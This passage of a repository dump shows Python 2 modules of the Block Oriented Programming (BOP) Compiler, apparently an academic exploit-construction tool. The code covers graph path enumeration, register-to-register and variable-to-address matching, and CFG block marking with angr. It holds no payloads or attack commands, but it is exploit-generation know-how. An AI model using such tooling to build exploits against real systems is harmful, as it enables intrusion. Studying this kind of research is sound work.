for n in graph.neighbors(curr):              \n                P = self.__enum_paths(n, graph, P+[(curr[0], F(curr[1]), F(n[1]))], __visited+[curr], F)\n                # P.append((curr, n))\n                \n\n        elif len(graph.neighbors(curr)) == 2:\n            n1, n2 = graph.neighbors(curr)\n            \n            # print n1, n2, self.__adj[curr[0]] \n\n            Q = self.__enum_paths(n1, graph, [(curr[0], F(curr[1]), F(n1[1]))], __visited+[curr], F)\n            R = self.__enum_paths(n2, graph, [(curr[0], 
F(curr[1]), F(n2[1]))], __visited+[curr], F)\n\n            # print 'Q IS', Q\n            # print 'R IS', R\n\n            # check if Q or R is the \"taken\" branch\n            # in adj the taken branch is always first\n            if self.__adj[curr[0]] == [n1[0], n2[0]]:\n                P.append([Q, R])                    # n1 is the \"taken\" branch\n            else:\n                P.append([R, Q])                    # n2 is the \"taken\" branch\n\n        else:\n            return P + [(curr[0], F(curr[1]), F(curr[1]))]\n\n        # print 'FINAL P', P\n        return P\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # flatten_graph(): Flatten the induced subgraph. Enumerate all paths and store them as \n    #   a tree of lists. \n    #\n    # :Arg graph: Current induced subgraph\n    # :Ret: A tuple (P, pretty): the flattened path tree and its pretty-printed version.\n    #\n    def flatten_graph( self, graph ):\n        '''\n        # self.__stack = ['e']\n        self.__visited = set()\n\n        graph = nx.DiGraph()\n    \n        graph.add_nodes_from( ['e', 'A2', 'A3', 'A4', 'A5', 'A6', 'A7'] )\n\n        graph.add_edge( 'e',  'A2', weight=0)\n        graph.add_edge( 'A2', 'A3', weight=30)\n        graph.add_edge( 'A2', 'A4', weight=2)\n        graph.add_edge( 'A3', 'A5', weight=4)\n        graph.add_edge( 'A4', 'A7', weight=1)\n        graph.add_edge( 'A5', 'e',  weight=2)\n        graph.add_edge( 'A5', 'A6', weight=3)\n        graph.add_edge( 'A6', 'A7', weight=3)\n        graph.add_edge( 'A7', 'A2', weight=2)\n\n        P = self.__enum_paths('e', graph, [], [])\n\n        # print 'P', P\n        '''        \n        self.__visited = set()\n\n        P      = self.__enum_paths((0, self.__entry), graph, [], [])\n        pretty = self.__enum_paths((0, self.__entry), graph, [], [], lambda x: '%x' % x)\n                \n        # TODO: Distinguish between taken/not taken branches\n                \n        return P, pretty\n\n# 
-------------------------------------------------------------------------------------------------\n\n"
  },
  {
    "path": "source/map.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# map.py:\n#\n# This module is responsible for mapping IR's virtual registers and variables, to host registers \n# and addresses of the target binary. During graph marking, we create a bipartite graph that\n# contains the virtual registers on the one set and the host registers on the other. The edges \n# denote potential mappings. Furthermore, when a variable is passed as a reference to a virtual\n# register, we encode that mapping (variable <-> address) as weight of the corresponding edege.\n#\n# Finding one such mapping doesn't imply that trace search algorithm will find a solution. Hence,\n# we need to go back, find another mapping and try again. This creates the need to enumerate *all*\n# possible mappings. So for each register mapping, we extract the edge weights and we enumerate \n# *all* possible variable mappings. 
We use the algorithm from [1] to make the enumeration efficient.\n#\n# The time complexity for register mapping is O(1), because the register set is constant (8 virtual\n# registers and 16 host registers). For the variable mappings the time complexity is:\n# O(|E|*|V|^0.5 + |N|*A), where A = total number of possible matchings.\n#\n#\n# [1]. Uno, Takeaki. \"Algorithms for enumerating all perfect, maximum and maximal matchings in \n#       bipartite graphs.\" Algorithms and Computation (1997): 92-101.  \n#\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\n\nimport networkx as nx\nimport __builtin__                                  # to use the built-in map()\nimport copy\nimport re\n\n\n# -------------------------------------------------------------------------------------------------\n# _match: This class finds all maximum matchings in a given bipartite undirected graph by using\n#   the algorithm as described in [1]. Note that the optimization of trimming unnecessary edges \n#   from D(G,M) is not implemented, as this class works with small graphs.\n#\n#   This class uses recursion to enumerate all matchings. So, every time a matching is found, a\n#   callback is invoked to process the matching. If the callback wants to stop getting matchings, \n#   it should return a negative value.\n#\nclass _match( object ): \n    ''' ======================================================================================= '''\n    '''                                   INTERNAL FUNCTIONS                                    '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __D(): Generate directed graph D(G,M) as defined in the original paper. Let V1 = __r0, __r1, \n    #       etc. (virtual registers) and V2 = rax, rdx, rcx, etc. (host registers), if we're in\n    #       \"register\" mode, and let V1 = $loc_2, etc. (variables) and V2 = 0x7ffff.... etc. \n    #       (addresses) if we're in \"variable\" mode.\n    #\n    # :Arg G: Undirected graph to work on.\n    # :Arg M: A maximum matching, as a list of tuples.\n    # :Ret: D(G,M) (directed).\n    #   \n    def __D( self, G, M ):\n        DG = nx.DiGraph()                           # create an empty directed graph        \n        DG.add_nodes_from(G.nodes())                # D(G,M) has the same vertices as G\n        DG.add_edges_from( M )                      # edges from M are directed from V1 to V2 in D\n        \n        for e in G.edges():                         # for each edge in G\n            if self.__opposite(e[0]):               # if edge is (host, virtual) or (addr, var)\n                e = (e[1], e[0])                    # swap it to (virtual, host) or (var, addr)\n                        \n            # print '!', e, M \n            if not e in M:                          # if edge not in M\n                DG.add_edge(e[1], e[0])             # add edge in reverse direction\n\n        return DG                                   # return D(G,M)\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __matchings_iter(): Given a graph G and a matching M, find another matching M' != M. This\n    #       is a recursive function, which means it will find all matchings. If the callback\n    #       function wants to stop enumerations for some reason, all it has to do is return a \n    #       negative value and __matchings_iter() will stop producing more matchings.\n    #\n    # :Arg G: Graph to work on\n    # :Arg M: A list of tuples, containing a maximum matching\n    # :Arg D: The special graph D(G,M)\n    # :Ret: Under normal execution, the function returns 0. 
If callback returns -1 at some point,\n    #   then the function enters exit mode, which always returns -1.\n    #\n    def __matchings_iter( self, G, M, D ):  \n        if G.number_of_edges() == 0:                # if G has no edges, stop (note: this must be\n            return 0                                # a call; without () it's always False)\n        \n        try:                                        # look for a cycle in D(G,M)\n            cycle = nx.algorithms.find_cycle(D, orientation='original') \n\n            ''' --------------------------------------------------------------------- '''\n            ''' we have found a cycle                                                 '''\n            ''' --------------------------------------------------------------------- '''\n\n            # exchange matching edges with other edges in cycle\n            Mprime  = [(e[1], e[0]) for e in cycle if e not in M] \n            Mprime += [e for e in M if e not in cycle]\n\n            # remove tuples from bitvector strings\n            Mprime = __builtin__.map(lambda x : (x[0],x[1][0]) if isinstance(x[1], tuple)   \n                                                               else x, Mprime)\n\n\n            # M' (Mprime) is a new maximum matching. Invoke callback\n            if self.__callback( sorted(Mprime, key=lambda e: e[0]) ) < 0:\n                return -1                           # if callback wants to stop, stop\n            \n\n            # pick an edge e that is both in M and cycle (always exists)\n            e = [e for e in cycle if e in M][0]\n\n        except nx.exception.NetworkXNoCycle:        # D(G,M) has no cycles\n            ''' --------------------------------------------------------------------- '''\n            ''' no cycle. 
Look for a feasible path of length 2                        '''\n            ''' --------------------------------------------------------------------- '''\n\n            feasible = None\n\n            # for each uncovered node in D(G,M)\n            # b/c we're dealing with max matchings, uncovered nodes, are host registers\n            for u in list(set(D.nodes()) - set([vtx for e in M for vtx in e])):\n\n                # for each possible target vertex (different from source)\n                for v in [v for v in D.nodes() if u != v]:\n                    # If a vertex is uncovered, then (path[0], path[1]) is not in M. Therefore,\n                    # (path[1], path[2]) must be in M due to the construction of D(G,M). So, if\n                    # the 2nd edge is in M, the other endpoint won't have any other edges in M\n                    # b/c current matching is maximum and there's already one edge of M adjacent\n                    # to that endpoint. This makes any length 2 path in D(G,M) starting from an\n                    # uncovered vertex, feasible.\n\n                    # try to find all simple paths of length *exactly* 2 (3 vertices)\n                    for path in nx.all_simple_paths(D, u, v, cutoff=2):\n                        if len(path) != 3: continue                 \n                        feasible = path             # we got a feasible path\n                        break\n\n                    if feasible: break              # break both loops\n                if feasible: break                  # break both loops\n\n            if not feasible: return 0               # if no feasible path, stop\n            \n            # get an edge e which is in feasible path but not in M\n            e = (feasible[1], feasible[0]) if   (feasible[1], feasible[0]) not in M \\\n                                           else (feasible[1], feasible[2]) \n                \n            # create a new matching\n            Mprime = [m for m in M if m[0] != 
e[0] ] + [e]\n\n\n            # remove tuples from bitvector strings\n            Mprime = __builtin__.map(lambda x : (x[0],x[1][0]) if isinstance(x[1], tuple)   \n                                                               else x, Mprime)\n\n\n            # M' (Mprime) is a new maximum matching. Invoke callback\n            if self.__callback( sorted(Mprime, key=lambda e: e[0]) ) < 0:\n                return -1                           # if callback wants to stop, stop\n\n            Mprime, M = M, Mprime                   # swap matchings (important!)\n\n        ''' ------------------------------------------------------------------------- '''\n        ''' common code for both cases                                                '''\n        ''' ------------------------------------------------------------------------- '''\n\n        # generate G+(e)\n        Gplus = copy.deepcopy(G)                    # get a hardcopy of G       \n        Gplus.remove_node( e[0] )                   # drop e and e's endpoints\n        Gplus.remove_node( e[1] )                   # along with all adjacent edges \n        \n        # generate G-(e)\n        Gminus = copy.deepcopy(G)                   # get a hardcopy of G\n        Gminus.remove_edge( e[0], e[1] )            # drop e\n\n        # OPTIONAL: As an optimization, we can trim unnecessary edges from D(G,M)\n\n        # recursively find matchings for G+(e) and G-(e)\n        if self.__matchings_iter(Gplus, M, self.__D(Gplus, [x for x in M if x != e]) ) < 0:\n            del Gplus, Gminus, D                    # release allocated objects\n            return -1                               # quickly return from recursions\n\n        if self.__matchings_iter(Gminus, Mprime, self.__D(Gminus, Mprime)) < 0:\n            del Gplus, Gminus, D                    # release allocated objects\n            return -1                               # quickly return from recursions\n\n\n        del Gplus, Gminus, D                        
# release allocated objects\n        return 0                                    # normal return\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __max_matchings_recursion(): Recursively find all maximum matchings for *registers*. This is\n    #       an exponential time approach, as it tries all possible combinations. However, it's useful \n    #       to evaluate the correctness of enum_max_matchings() (debug only).\n    #\n    # :Arg G: Graph to work on\n    # :Arg depth: Current recursion depth\n    # :Arg M: Current matching\n    # :Ret: None.\n    #\n    def __max_matchings_recursion( self, G, depth, M ):\n        if depth >= self.__n:                       # reached max depth?\n            self.__callback(M)                      # invoke callback and stop\n            return\n\n        curr = '__r%d' % depth                      # make current virtual register\n\n        for n in G.neighbors( curr ):               # for each adjacent vertex\n            # code is for debug, so keep it simple: Instead of keeping track of\n            # edges and nodes you remove, just copy the whole graph\n            NG = copy.deepcopy(G)\n\n            NG.remove_node( curr )                  # drop nodes that make a pair\n            NG.remove_node( n )\n\n            # move on to the next matching\n            self.__max_matchings_recursion(NG, depth+1, M+[(curr, n)])\n            \n            del NG                                  # new graph not needed anymore\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # 
---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor.\n    #\n    # :Arg graph: Graph to work on\n    # :Arg mode: Working mode (register/variable)\n    #\n    def __init__( self, graph, mode ):  \n        if not nx.is_bipartite(graph):              # check if graph is bipartite\n            raise Exception('Not a bipartite graph!')\n            \n        if nx.is_directed(graph):                   # check if graph is undirected\n            raise Exception('Not an undirected graph!')\n\n        self.__G = copy.deepcopy(graph)             # get graph\n\n\n        # drop nodes without edges\n        for n in [n for n in graph.nodes() if graph.degree(n) == 0]:\n            self.__G.remove_node(n)                 # remove node \n        \n\n        # opposite() is used to check the orientation of an edge\n        # check mode and set lambda accordingly.\n        try:                                        \n            self.__mode, self.__opposite = mode, {\n                'register' : lambda key : not re.match(r'^__r.$', key),\n                'variable' : lambda key : isinstance(key, long) or isinstance(key, tuple)\n            }[ mode ]\n        except KeyError: \n            fatal(\"Invalid mode '%s'\" % mode )      # invalid mode\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __del__(): Class destructor.\n    #\n    def __del__( self ):\n        del self.__G                                # release graph\n\n\n    # ---------------------------------------------------------------------------------------------\n    # enum_max_matchings(): Enumerate all maximum matchings.\n    #\n    # :Arg callback: A callback function to be invoked every time a new matching is found\n    # :Arg n: Size of max matching (optional)\n    # :Ret: None.\n    #\n    def enum_max_matchings( self, callback, n=-1 ):\n        self.__callback = 
callback                  # save callback function\n\n        # find a maximum matching in M      \n        M = nx.bipartite.maximum_matching(self.__G)\n\n        # M is a dictionary like: {'__r0': 'rdx', '__r1': 'rcx', '__r2': 'rax', 'rdx': '__r0', \n        # 'rcx': '__r1', 'rax': '__r2'}. Each edge appears in both forward and reverse \n        # direction. So, we only keep edges in one direction (V1 -> V2)\n        #\n        # don't use .iteritems() (dictionary is modified on the fly)\n        for key, val in M.items():\n            if self.__opposite(key):                # drop (host, virtual) (or (addr, var)) edges \n                del M[key]\n\n        M = M.items()                               # cast dictionary to list (for convenience)\n\n\n        # To get the number of virtual registers in the graph we can't use this:\n        #   virt, _ = nx.bipartite.sets(self.__G) \n        # \n        # This is because bipartite.sets() algorithmically finds the sets. So, if a node has no\n        # edges it will be classified in the 2nd set, even if it has attribute bipartite = 0. 
To\n        # fix that we can either drop nodes with no edges, or use an alternative:\n        virt = [u for u, b in nx.get_node_attributes(self.__G,'bipartite').iteritems() if not b]\n\n\n        # check if the matching covers all virtual registers (or variables)\n        # if no explicit size is given, extract size from bipartite sets        \n        if (n > 0 and len(M) < n) or (n < 0 and len(M) < len(virt)):                    \n            dbg_arb(DBG_LVL_3, \"There are no maximum matchings for\", self.__G.edges())\n            return 0                                # abort\n\n\n        # TODO: M can be:\n        #   [('__r0', 'r14'), ('__r1', 'r15')]\n        #   [('foo', ('<BV64 0x7ffffffffff0020>',))]\n        #\n        # Because bitvectors are strings at this point, no exceptions are thrown\n\n        # remove tuples from bitvector strings\n        M = __builtin__.map(lambda x : (x[0],x[1][0]) if isinstance(x[1], tuple) else x, M)\n\n        # print 'M IS ', M\n\n        # M is the 1st maximum matching. Invoke callback\n        # if self.__callback( sorted(M, key=lambda e: e[0]) ) < 0:\n        if self.__callback( M ) < 0:\n            return -1                               # if callback wants to stop, stop\n\n        # OPTIONAL: As an optimization, we can trim unnecessary edges from D(G,M)\n\n        # find all other maximum matchings\n        return self.__matchings_iter(self.__G, M, self.__D(self.__G, M))    \n\n\n    # ---------------------------------------------------------------------------------------------\n    # enum_max_matchings_bf(): Enumerate all maximum matchings using brute force. 
This is simply\n    #       a wrapper around __max_matchings_recursion() (register mode, debug only).\n    #\n    # :Arg callback: A callback function to be invoked every time a new matching is found\n    # :Arg n: Size of max matching\n    # :Ret: None.\n    #\n    def enum_max_matchings_bf( self, callback, n ):\n        self.__callback = callback                  # save callback function\n        self.__n        = n                         # size of max matching\n\n        if self.__mode != 'register':               # this is only available in register mode\n            fatal(\"Brute force matching is not supported in variable mode\")\n\n        self.__max_matchings_recursion(self.__G, 0, [])\n\n\n# -------------------------------------------------------------------------------------------------\n\n\n# -------------------------------------------------------------------------------------------------\n# map: This class finds all matchings between virtual and host registers and between variables and \n#   addresses. This is mostly a wrapper around the _match class. \n#\nclass map( object ):\n    ''' ======================================================================================= '''\n    '''                                   INTERNAL FUNCTIONS                                    '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __intrl_callback_var(): This callback is invoked every time a new variable matching is\n    #       found. This function is implicitly invoked by __intrl_callback_reg() which means that\n    #       at this point there is already a register mapping. 
This function is actually a wrapper\n    #       for the original callback of enum_mappings().\n    #\n    # :Arg match: A new matching, as a list of tuples\n    # :Ret: If function wants to be invoked again with a new matching, it should return a non\n    #   negative value. Otherwise returns 0.\n    #\n    def __intrl_callback_var( self, match ):\n\n        # invoke the real callback\n        return self.__callback(self.__reg_match, match)\n        \n\n    # ---------------------------------------------------------------------------------------------\n    # __intrl_callback_reg(): This callback is invoked every time that a new register matching is\n    #       found. At this point we have a maximum matching for registers (register mapping). \n    #       Given this matching, create the variable graph and enumerate all possible variable \n    #       matchings.\n    #\n    # :Arg match: A new matching, as a list of tuples\n    # :Ret: If function wants to be invoked again with a new matching, it should return a non\n    #   negative value. 
Otherwise returns 0.\n    #\n    def __intrl_callback_reg( self, match ):\n        self.__reg_match = match                    # save matching for later\n\n        vG = nx.Graph()                             # variable graph        \n        \n        for u, v in match:                          # for each edge in register mapping\n            try:\n                for a,b in self.__g.get_edge_data(u, v)['var']:\n                    vG.add_node(a, bipartite=0)\n                    vG.add_node(b, bipartite=1)\n                    vG.add_edge(a, b)\n            except KeyError: pass                   # edge has no weights\n        \n        match = _match(vG, 'variable')              # create a 2nd matching object\n\n\n        # enumerate all variable matchings, using a 2nd internal callback\n        if match.enum_max_matchings(self.__intrl_callback_var, self.__nvars) < 0:           \n            del match                               # free object   \n            return -1                               # no more matchings\n\n        del match                                   # free object\n        return 0                                    # normal return\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor.\n    #\n    # :Arg graph: Graph to work on\n    # :Arg nregs: Total number of virtual registers\n    # :Arg nvars: Total number of variables\n    #\n    def __init__( self, graph, nregs, nvars ):\n        self.__g     = graph                        # store arguments\n     
   self.__nregs = nregs\n        self.__nvars = nvars\n\n\n    # ---------------------------------------------------------------------------------------------\n    # enum_mappings(): Enumerate all possible register and variable mappings.\n    #\n    # :Arg callback: A callback function to be invoked, every time a mapping is found\n    # :Ret: None.\n    #\n    def enum_mappings( self, callback ):        \n        dbg_prnt(DBG_LVL_1, \"Enumerating all mappings between virtual and hardware registers\")\n        dbg_prnt(DBG_LVL_1, \"\\tand all mappings between variables and addresses...\")\n\n        self.__callback = callback                  # get callback\n\n        try:        \n            match = _match(self.__g, 'register')    # create a matching object\n        except Exception: return                    # catch exception\n\n        # enumerate all register matchings, using an internal callback\n        ret = match.enum_max_matchings(self.__intrl_callback_reg, self.__nregs)\n\n        del match                                   # free object\n        \n        return ret\n\n# -------------------------------------------------------------------------------------------------\n'''\nif __name__ == '__main__':                          # DEBUG ONLY\n    G = nx.Graph()\n    \n    G.add_nodes_from(['__r0', '__r1', '__r2', '__r3'], bipartite=0)\n    G.add_nodes_from(['rax', 'rdx', 'rcx', 'rbx', 'rsi', 'rdi'], bipartite=1)   \n    \n    G.add_edges_from([ \n        ('__r0', 'rax'), ('__r0', 'rcx'), ('__r0', 'rsi'),\n        #('__r1', 'rax'), ('__r1', 'rdx'), ('__r1', 'rcx'), ('__r1', 'rbx'),\n        ('__r2', 'rcx'), ('__r2', 'rdi'), ('__r2', 'rsi'),\n        ('__r3', 'rdx'), ('__r3', 'rdi'), ('__r3', 'rsi')\n\n    ])  \n    \n#   G.add_nodes_from(['$loc_2'], bipartite=0)\n#   G.add_nodes_from([576460752303358032L, 576460752303358048L, 576460752303358064L], bipartite=1)  \n#\n#   G.add_edges_from([ \n#       ('$loc2', 576460752303358032L),\n#       ('$loc2', 
576460752303358048L),\n#       ('$loc2', 576460752303358064L)\n#   ])\n    \n    def callback( m ):\n        print 'Got matching: ', m\n        return 0                                    # must return a non-negative value\n\n    m = _match( G, 'register' )\n    m.enum_max_matchings( callback )\n\n    print '----------------------------------------'\n    m.enum_max_matchings_bf( callback, 4 )\n'''\n# -------------------------------------------------------------------------------------------------\n"
  },
  {
    "path": "source/mark.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# mark.py:\n#\n# This module is responsible for marking the CFG. To mark a basic block, it has to be abstracted\n# first (otherwise the marking process is still possible but very complicated). A basic block can\n# be marked as \"candidate\", \"accepted\", \"clobbering\", or \"failed\". 
Below are the preconditions for each \n# marking type:\n#\n#   candidate  : A basic block fulfils the requirements to execute one (or more) SPL statements,\n#                but there is not enough information to determine whether it can truly execute\n#                those statement(s).\n#\n#   accepted   : A basic block that can truly be used to execute one (or more) SPL statements.\n#\n#   clobbering : A basic block that \"clobbers\" (i.e., interferes with) the execution of an \n#                accepted block and therefore needs to be avoided.\n#\n#   failed     : Analysis on that basic block failed and therefore it should be treated as \n#                clobbering at all times.\n#\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\nfrom calls     import *\n\nimport absblk as A\n\nimport angr\nimport claripy\nimport simuvex\n\nimport networkx as nx\n\nimport struct\nimport copy\nimport cPickle as pickle\nimport pprint\nimport math\nimport re\n\n\n\n# -------------------------------------------------------------------------------------------------\n# mark: This class is responsible for marking the CFG.\n#\nclass mark( object ):\n    ''' ======================================================================================= '''\n    '''                                   INTERNAL FUNCTIONS                                    '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __blk_cnt(): Count the number of \"functional\" basic blocks in the CFG.\n    #\n    # :Arg avoid: A list of function names to avoid (optional)\n    # :Arg which: Which basic blocks to count (default: 'all')\n    # :Ret: The number of basic blocks in the CFG.\n    # \n    def __blk_cnt( self, avoid=[], which='all'):     \n        # 
---------------------------------------------------------------------\n        # Abstract method\n        #\n        # Count only abstracted basic blocks\n        # ---------------------------------------------------------------------\n        if which == 'abstract':\n            return len(nx.get_node_attributes(self.__cfg.graph, 'abstr').items())\n\n        # ---------------------------------------------------------------------\n        # All method\n        #\n        # Count all basic blocks\n        # ---------------------------------------------------------------------\n        elif which == 'all':\n            cnt = 0                                 # initialize counter\n\n            for addr, func in self.__cfg.kb.functions.iteritems():\n                # skip functions that are outside of the main_object, e.g.:\n                #   <ExternObject Object cle##externs, maps [0x1000000:0x1008000]>,\n                #   <KernelObject Object cle##kernel,  maps [0x3000000:0x3008000]>\n                if addr < self.__proj.loader.main_object.min_addr or \\\n                   addr > self.__proj.loader.main_object.max_addr:\n                        continue\n\n                if func.name in avoid:              # you may need to exclude some functions\n                    continue            \n                \n\n                for bb in func.block_addrs:         # count them 1 by 1 (len() doesn't work)\n                    cnt += 1\n\n            return cnt\n\n        # ---------------------------------------------------------------------\n        # Any other method should raise an error\n        # ---------------------------------------------------------------------\n        else: \n            fatal(\"Unknown method\")\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __blk_iter(): Iterate over basic blocks. 
This function is a generator over \"all\" basic\n    #       blocks in the CFG.\n    #\n    # :Arg avoid: A list of function names to avoid (optional)\n    # :Arg method: Iteration method (block/node/abstracted)\n    # :Ret: Each iteration yields either the address of the next basic block\n    #       ('block' method), or a tuple (node, attributes) of the next basic block in the\n    #       CFG ('node' and 'abstracted' methods).\n    # \n    def __blk_iter( self, avoid=[], method='block' ):\n        # ---------------------------------------------------------------------\n        # Block method\n        #\n        # Iterate over each function and for each function iterate over block\n        # addresses.\n        # ---------------------------------------------------------------------\n        if method == 'block':\n            # iterate over each function\n            for addr, func in self.__cfg.kb.functions.iteritems():\n                # skip functions that are outside of the main_object, e.g.:\n                #   <ExternObject Object cle##externs, maps [0x1000000:0x1008000]>,\n                #   <KernelObject Object cle##kernel,  maps [0x3000000:0x3008000]>\n                if addr < self.__proj.loader.main_object.min_addr or \\\n                   addr > self.__proj.loader.main_object.max_addr:\n                        continue\n\n                if func.name in avoid:              # you may need to exclude some functions\n                    dbg_prnt(DBG_LVL_3, \"Skipping function '%s'!\" % func.name)\n                    continue            \n\n\n                # iterate over basic blocks for each function (sort them to ease debugging)\n                for bb in sorted(func.block_addrs):                                \n                    yield bb                        # return address of the next block\n\n\n        # ---------------------------------------------------------------------\n        # Node method\n        #\n        # 
Iterate over all nodes in CFG directly.\n        # ---------------------------------------------------------------------\n        elif method == 'node':\n            avoid_addr = { }                        # set of avoided functions\n\n            # iterate over each function\n            for addr, func in self.__cfg.kb.functions.iteritems():\n                if func.name in avoid:\n                    avoid_addr[ addr ] = 1          # mark blocks that you want to avoid\n\n\n            # now iterate over nodes\n            for node, attr in self.__cfg.graph.nodes_iter(data=True):\n                # skip functions that are outside of the main_object, e.g.:\n                #   <ExternObject Object cle##externs, maps [0x1000000:0x1008000]>,\n                #   <KernelObject Object cle##kernel,  maps [0x3000000:0x3008000]>\n                if node.addr < self.__proj.loader.main_object.min_addr or \\\n                   node.addr > self.__proj.loader.main_object.max_addr:\n                        continue\n\n                if node.addr in avoid_addr:         # if block is blacklisted,\n                    continue                        # skip it\n\n                yield node, attr                    # return tuple for that node\n\n\n        # ---------------------------------------------------------------------\n        # Abstract method\n        #\n        # Iterate over abstracted basic blocks\n        # ---------------------------------------------------------------------\n        elif method == 'abstract':\n            for node, attr in nx.get_node_attributes(self.__cfg.graph, 'abstr').iteritems(): \n                yield node, attr                    # return tuple for the abstracted block\n\n\n        # ---------------------------------------------------------------------\n        # Any other method should raise an error\n        # ---------------------------------------------------------------------\n        else: \n            fatal(\"Unknown 
method\")\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __reg_filter(): Apply a filter to a given hardware register. Although it's better to apply\n    #       this function on absblk, it's harder to make changes once abstractions are generated.\n    #\n    # :Arg reg: A register to check\n    # :Ret: If filter discards register, function returns False. Otherwise it returns True.\n    #\n    def __reg_filter( self, reg ):\n        # drop register mappings that use rsp (or rbp if configured)\n        if reg == 'rsp' or (reg == 'rbp' and not MAKE_RBP_SYMBOLIC):\n            dbg_prnt(DBG_LVL_4, \"A virtual register cannot be mapped to '%s'\" % \n                                bolds(reg))\n\n            return False                            # can't pass through the filter\n\n        return True                                 # register not discarded\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __imm_addr(): Check if an address dereference stays immutable during block execution.\n    #       Consider the following example:\n    #\n    #           .text:00000000004008C0 add     eax, ebx\n    #           .text:00000000004008C2 mov     cs:foo, eax\n    #           .text:00000000004008C8 mov     eax, cs:foo\n    #\n    #       Here, although the value of eax is loaded from memory, we have no control over it, as\n    #       the same memory cell is being written by another register.\n    #\n    #\n    # :Arg address: Address to check\n    # :Arg abstr: The whole block abstractions\n    # :Ret: If address is immutable function returns True. 
Otherwise it returns False.\n    #\n    def __imm_addr( self, address, abstr ):\n        if isinstance(address, int):\n            for addr, _ in abstr['conwr']:          # check concrete writes\n                if addr == address:\n                    dbg_prnt(DBG_LVL_3, \"Address 0x%x is not immutable.\" % address)\n                    return False \n\n        else:\n            for addr, _ in abstr['memwr']:          # check other writes\n                if addr.shallow_repr() == address.shallow_repr():\n                    dbg_prnt(DBG_LVL_3, \"Address '%s' is not immutable.\" % addr.shallow_repr())\n                    return False\n\n        return True\n\n\n\n    # --------------------------------------------------------------------------------------------- \n    # __mk_unique(): Make an address string unique.\n    #\n    # :Arg addrstr: Address string\n    # :Arg sym: Symbolic variable\n    # :Ret: A unique address\n    #\n    def __mk_unique(self, addrstr, sym):\n\n        addrstr_orig = addrstr\n        sym_orig     = sym\n\n\n        if not sym:\n            # we don't care about non-register addresses as their shallow_reprs are identical\n            return addrstr_orig, sym_orig\n\n\n        orig = addrstr\n        for reg in HARDWARE_REGISTERS:\n            # This is tooooo slow!\n            #   orig = re.sub(r'%s_[0-9]+_64' % reg, '%s_64' % reg, orig)\n\n            # use the compiled version instead\n            orig = self.__regex[reg].sub('%s_64' % reg, orig)\n\n\n        # if dereference is already there, use it\n        if orig in self.__unique_derefs:\n            return self.__unique_derefs[orig] # (addr, sym)\n\n\n        # if unique, add it to the dictionary and return it as it is\n        self.__unique_derefs[orig] = (addrstr_orig, sym_orig)\n\n        return addrstr_orig, sym_orig\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' 
